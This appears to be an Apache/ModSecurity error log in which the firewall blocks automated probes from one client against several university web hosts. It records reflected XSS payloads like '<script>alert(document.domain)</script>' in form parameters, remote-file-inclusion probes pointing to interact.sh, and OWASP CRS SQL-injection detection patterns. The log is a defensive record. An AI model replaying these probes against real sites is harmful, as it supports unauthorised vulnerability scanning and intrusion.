[Tue Aug 29 11:55:14.711220 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApXgnsAAAAU"]
[Tue Aug 29 11:55:14.712855 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAoz8D8AAAAS"]
[Tue Aug 29 11:55:15.576084 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAAqeFSgAAAAx"]
[Tue Aug 29 11:55:15.591340 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAAqsV4cAAAAB"]
[Tue Aug 29 11:55:16.148615 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16NMCo-f0AAApOdjkAAAAL"]
[Tue Aug 29 11:55:16.531511 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqeFSsAAAAx"]
[Tue Aug 29 11:55:16.538597 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqsV4oAAAAB"]
[Tue Aug 29 11:55:16.550738 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BMAAAAr"]
[Tue Aug 29 11:55:16.594912 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqTvpAAAAAa"]
[Tue Aug 29 11:55:16.643658 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpEAAAAa"]
[Tue Aug 29 11:55:16.648964 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BUAAAAr"]
[Tue Aug 29 11:55:16.671345 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6BYAAAAr"]
[Tue Aug 29 11:55:16.683813 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpMAAAAa"]
[Tue Aug 29 11:55:16.724960 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpQAAAAa"]
[Tue Aug 29 11:55:16.774480 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6BkAAAAr"]
[Tue Aug 29 11:55:17.555302 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqw500AAAAH"]
[Tue Aug 29 11:55:17.555642 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqY6CoAAAAr"]
[Tue Aug 29 11:55:17.622513 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqw508AAAAH"]
[Tue Aug 29 11:55:17.622727 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqSwrQAAAAN"]
[Tue Aug 29 11:55:17.625603 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqvjmsAAAAE"]
[Tue Aug 29 11:55:17.628172 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAolKlkAAAAe"]
[Tue Aug 29 11:55:17.663918 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAolKloAAAAe"]
[Tue Aug 29 11:55:17.664775 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqSwrUAAAAN"]
